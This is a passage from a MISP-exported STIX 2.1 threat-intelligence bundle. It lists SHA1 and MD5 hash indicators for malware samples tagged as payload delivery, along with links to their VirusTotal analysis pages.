"url--58db8132-3eb0-403b-8162-4cc302de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8132-3eb0-403b-8162-4cc302de0b81",
|
|
"value": "https://www.virustotal.com/file/5e0612a0124b15e193f630346800aee5307477110a5d4f8df23fc41d1d451387/analysis/1425341271/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8133-e7f0-48a7-8ecd-482202de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:41:07.000Z",
|
|
"modified": "2017-03-29T09:41:07.000Z",
|
|
"description": "sample - Xchecked via VT: dfa8a776451866e2773d57f79a839b2baddbf50792794993bdcefd0631c3f9b3",
|
|
"pattern": "[file:hashes.SHA1 = 'a573fbe668490aa4f077bbf7c48fe27a21b786cf']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:41:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8134-13ac-4544-b87c-4dc102de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:41:08.000Z",
|
|
"modified": "2017-03-29T09:41:08.000Z",
|
|
"description": "sample - Xchecked via VT: dfa8a776451866e2773d57f79a839b2baddbf50792794993bdcefd0631c3f9b3",
|
|
"pattern": "[file:hashes.MD5 = '620144d0485a6778993d7fbd90afad61']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:41:08Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8135-9444-46e5-8b88-493502de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:41:09.000Z",
|
|
"modified": "2017-03-29T09:41:09.000Z",
|
|
"first_observed": "2017-03-29T09:41:09Z",
|
|
"last_observed": "2017-03-29T09:41:09Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8135-9444-46e5-8b88-493502de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8135-9444-46e5-8b88-493502de0b81",
|
|
"value": "https://www.virustotal.com/file/dfa8a776451866e2773d57f79a839b2baddbf50792794993bdcefd0631c3f9b3/analysis/1423709098/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8136-4d70-4f6d-b5fa-4ed902de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:41:10.000Z",
|
|
"modified": "2017-03-29T09:41:10.000Z",
|
|
"description": "sample - Xchecked via VT: ff5c86f1287d1b8ffc5822792ac00255176d706859749b7f2d4baef49f1f833a",
|
|
"pattern": "[file:hashes.SHA1 = '7238e87c0c0f944aa530f533b06255091e84d4fc']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:41:10Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8137-f364-484f-bb8d-481f02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:41:11.000Z",
|
|
"modified": "2017-03-29T09:41:11.000Z",
|
|
"description": "sample - Xchecked via VT: ff5c86f1287d1b8ffc5822792ac00255176d706859749b7f2d4baef49f1f833a",
|
|
"pattern": "[file:hashes.MD5 = 'b4ef518d73e6f9781a44a8480f70dfa4']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:41:11Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8137-fc8c-4c62-beb8-400802de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:41:11.000Z",
|
|
"modified": "2017-03-29T09:41:11.000Z",
|
|
"first_observed": "2017-03-29T09:41:11Z",
|
|
"last_observed": "2017-03-29T09:41:11Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8137-fc8c-4c62-beb8-400802de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8137-fc8c-4c62-beb8-400802de0b81",
|
|
"value": "https://www.virustotal.com/file/ff5c86f1287d1b8ffc5822792ac00255176d706859749b7f2d4baef49f1f833a/analysis/1433076601/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8138-eb70-4f6b-a886-4c3e02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:41:12.000Z",
|
|
"modified": "2017-03-29T09:41:12.000Z",
|
|
"description": "sample - Xchecked via VT: c2b5a2df6b792edac0d491a643cb525012f959934ba7a1846e14e51c810d8d42",
|
|
"pattern": "[file:hashes.SHA1 = '5f8eef017d449dea3847310ec56e1d318f87c3ef']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:41:12Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8139-1e38-4630-834e-406402de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:41:13.000Z",
|
|
"modified": "2017-03-29T09:41:13.000Z",
|
|
"description": "sample - Xchecked via VT: c2b5a2df6b792edac0d491a643cb525012f959934ba7a1846e14e51c810d8d42",
|
|
"pattern": "[file:hashes.MD5 = '3ad605ac96421d91fbb4bfd1bb27923c']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:41:13Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db813a-8df8-452c-aff0-4bcf02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:41:14.000Z",
|
|
"modified": "2017-03-29T09:41:14.000Z",
|
|
"first_observed": "2017-03-29T09:41:14Z",
|
|
"last_observed": "2017-03-29T09:41:14Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db813a-8df8-452c-aff0-4bcf02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db813a-8df8-452c-aff0-4bcf02de0b81",
|
|
"value": "https://www.virustotal.com/file/c2b5a2df6b792edac0d491a643cb525012f959934ba7a1846e14e51c810d8d42/analysis/1462241261/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db813b-c860-4bb7-8d64-47e602de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:41:15.000Z",
|
|
"modified": "2017-03-29T09:41:15.000Z",
|
|
"description": "sample - Xchecked via VT: 4a1dcecd71ff7323eb3d0b1bcfc4d61b859e7734fcaa33b01bc3b727557b4d52",
|
|
"pattern": "[file:hashes.SHA1 = '0dca949120b7901b702a9229c6c80dd8af3380e1']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:41:15Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db813c-cc88-4b05-b1e4-421902de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:41:16.000Z",
|
|
"modified": "2017-03-29T09:41:16.000Z",
|
|
"description": "sample - Xchecked via VT: 4a1dcecd71ff7323eb3d0b1bcfc4d61b859e7734fcaa33b01bc3b727557b4d52",
|
|
"pattern": "[file:hashes.MD5 = '91cef42fc3b58dd486db507d6de37e5b']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:41:16Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db813d-4bb0-468b-b1f2-4dad02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:41:17.000Z",
|
|
"modified": "2017-03-29T09:41:17.000Z",
|
|
"first_observed": "2017-03-29T09:41:17Z",
|
|
"last_observed": "2017-03-29T09:41:17Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db813d-4bb0-468b-b1f2-4dad02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db813d-4bb0-468b-b1f2-4dad02de0b81",
|
|
"value": "https://www.virustotal.com/file/4a1dcecd71ff7323eb3d0b1bcfc4d61b859e7734fcaa33b01bc3b727557b4d52/analysis/1434534931/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db813e-e4cc-4c9a-8024-445d02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:41:18.000Z",
|
|
"modified": "2017-03-29T09:41:18.000Z",
|
|
"description": "sample - Xchecked via VT: 31f6399b3423324eea084964bd979689bb367021b424e264f32c3787bfce85e7",
|
|
"pattern": "[file:hashes.SHA1 = '802f4125e802cac4543a42247986f9f9406c2ea8']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:41:18Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db813f-1368-4490-8ee3-4c2802de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:41:19.000Z",
|
|
"modified": "2017-03-29T09:41:19.000Z",
|
|
"description": "sample - Xchecked via VT: 31f6399b3423324eea084964bd979689bb367021b424e264f32c3787bfce85e7",
|
|
"pattern": "[file:hashes.MD5 = '5e4690fb610e3ce844874532e378e34f']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:41:19Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8140-fc30-4e2c-9557-4dc202de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:41:20.000Z",
|
|
"modified": "2017-03-29T09:41:20.000Z",
|
|
"first_observed": "2017-03-29T09:41:20Z",
|
|
"last_observed": "2017-03-29T09:41:20Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8140-fc30-4e2c-9557-4dc202de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8140-fc30-4e2c-9557-4dc202de0b81",
|
|
"value": "https://www.virustotal.com/file/31f6399b3423324eea084964bd979689bb367021b424e264f32c3787bfce85e7/analysis/1435049475/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8141-f000-4871-b987-403b02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:41:21.000Z",
|
|
"modified": "2017-03-29T09:41:21.000Z",
|
|
"description": "sample - Xchecked via VT: b33e64b53c8f4af8e8cc75feb2de709da7614082ffd19f7a2110eb1b8b8ab546",
|
|
"pattern": "[file:hashes.SHA1 = 'a88a9907c76b2a13ebfc4d88e5f4393be5afc6ac']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:41:21Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8142-0b4c-43d1-9f04-4cf702de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:41:22.000Z",
|
|
"modified": "2017-03-29T09:41:22.000Z",
|
|
"description": "sample - Xchecked via VT: b33e64b53c8f4af8e8cc75feb2de709da7614082ffd19f7a2110eb1b8b8ab546",
|
|
"pattern": "[file:hashes.MD5 = '9a5e04d86741b058347fd0fc0f97bf47']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:41:22Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8143-ebf4-4f11-ad82-481902de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:41:23.000Z",
|
|
"modified": "2017-03-29T09:41:23.000Z",
|
|
"first_observed": "2017-03-29T09:41:23Z",
|
|
"last_observed": "2017-03-29T09:41:23Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8143-ebf4-4f11-ad82-481902de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8143-ebf4-4f11-ad82-481902de0b81",
|
|
"value": "https://www.virustotal.com/file/b33e64b53c8f4af8e8cc75feb2de709da7614082ffd19f7a2110eb1b8b8ab546/analysis/1442575667/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8144-571c-4efa-b2c6-4e6a02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:41:24.000Z",
|
|
"modified": "2017-03-29T09:41:24.000Z",
|
|
"description": "sample - Xchecked via VT: 206c8c6f0bf5792631387b823cb4c1682041805b5c3241cd6d700c6e5475066b",
|
|
"pattern": "[file:hashes.SHA1 = 'e60b88a8d6a218b0807dccf03d738cd7aaa1b228']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:41:24Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8144-e95c-4737-b7ca-478c02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:41:24.000Z",
|
|
"modified": "2017-03-29T09:41:24.000Z",
|
|
"description": "sample - Xchecked via VT: 206c8c6f0bf5792631387b823cb4c1682041805b5c3241cd6d700c6e5475066b",
|
|
"pattern": "[file:hashes.MD5 = '083ee14d27b8c10258f2880578fee9fe']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:41:24Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8145-8a74-493d-b130-4c2402de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:41:25.000Z",
|
|
"modified": "2017-03-29T09:41:25.000Z",
|
|
"first_observed": "2017-03-29T09:41:25Z",
|
|
"last_observed": "2017-03-29T09:41:25Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8145-8a74-493d-b130-4c2402de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8145-8a74-493d-b130-4c2402de0b81",
|
|
"value": "https://www.virustotal.com/file/206c8c6f0bf5792631387b823cb4c1682041805b5c3241cd6d700c6e5475066b/analysis/1476679324/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8146-cd3c-4589-a69d-47e002de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:41:26.000Z",
|
|
"modified": "2017-03-29T09:41:26.000Z",
|
|
"description": "sample - Xchecked via VT: 320183fca03a973f746adba3e5bdac62be152bc4d32c6cf466383cd951ec2560",
|
|
"pattern": "[file:hashes.SHA1 = '77998d03406e0f2428764ee3f9ed12cb2c0f551e']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:41:26Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8147-ea44-414d-a156-442202de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:41:27.000Z",
|
|
"modified": "2017-03-29T09:41:27.000Z",
|
|
"description": "sample - Xchecked via VT: 320183fca03a973f746adba3e5bdac62be152bc4d32c6cf466383cd951ec2560",
|
|
"pattern": "[file:hashes.MD5 = '879180cab19e10c879cfb2d5d48b47f0']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:41:27Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8148-9e6c-4e75-9ac7-44c502de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:41:28.000Z",
|
|
"modified": "2017-03-29T09:41:28.000Z",
|
|
"first_observed": "2017-03-29T09:41:28Z",
|
|
"last_observed": "2017-03-29T09:41:28Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8148-9e6c-4e75-9ac7-44c502de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8148-9e6c-4e75-9ac7-44c502de0b81",
|
|
"value": "https://www.virustotal.com/file/320183fca03a973f746adba3e5bdac62be152bc4d32c6cf466383cd951ec2560/analysis/1477386612/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8149-ca60-4be9-a584-4f9002de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:41:29.000Z",
|
|
"modified": "2017-03-29T09:41:29.000Z",
|
|
"description": "sample - Xchecked via VT: 35f636b1876b17b923486924ebe629a98465b480f6635c9db09a16814a5eada3",
|
|
"pattern": "[file:hashes.SHA1 = 'bbf1edd2d930a1f5c80d1d984e67171b7be6fd9c']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:41:29Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db814a-9c54-4ccd-aac9-4b1402de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:41:30.000Z",
|
|
"modified": "2017-03-29T09:41:30.000Z",
|
|
"description": "sample - Xchecked via VT: 35f636b1876b17b923486924ebe629a98465b480f6635c9db09a16814a5eada3",
|
|
"pattern": "[file:hashes.MD5 = '6cf7e9e5ed0ccff71c1efefbdaee770f']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:41:30Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db814b-094c-4a34-a404-47d102de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:41:31.000Z",
|
|
"modified": "2017-03-29T09:41:31.000Z",
|
|
"first_observed": "2017-03-29T09:41:31Z",
|
|
"last_observed": "2017-03-29T09:41:31Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db814b-094c-4a34-a404-47d102de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db814b-094c-4a34-a404-47d102de0b81",
|
|
"value": "https://www.virustotal.com/file/35f636b1876b17b923486924ebe629a98465b480f6635c9db09a16814a5eada3/analysis/1485525584/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db814c-d11c-4990-8854-4bd602de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:41:32.000Z",
|
|
"modified": "2017-03-29T09:41:32.000Z",
|
|
"description": "sample - Xchecked via VT: bfdad4010fb8104881c0392ff3d60e43e9eee73a7f8d00ab2097898dcfc14710",
|
|
"pattern": "[file:hashes.SHA1 = 'b66ebe2dd22d81e55c54225ba577646069670aac']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:41:32Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db814d-a550-4214-afb5-499402de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:41:33.000Z",
|
|
"modified": "2017-03-29T09:41:33.000Z",
|
|
"description": "sample - Xchecked via VT: bfdad4010fb8104881c0392ff3d60e43e9eee73a7f8d00ab2097898dcfc14710",
|
|
"pattern": "[file:hashes.MD5 = '41bba5877eea4bb8b251e66a6b45a750']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:41:33Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db814e-8084-479f-95e5-43a602de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:41:34.000Z",
|
|
"modified": "2017-03-29T09:41:34.000Z",
|
|
"first_observed": "2017-03-29T09:41:34Z",
|
|
"last_observed": "2017-03-29T09:41:34Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db814e-8084-479f-95e5-43a602de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
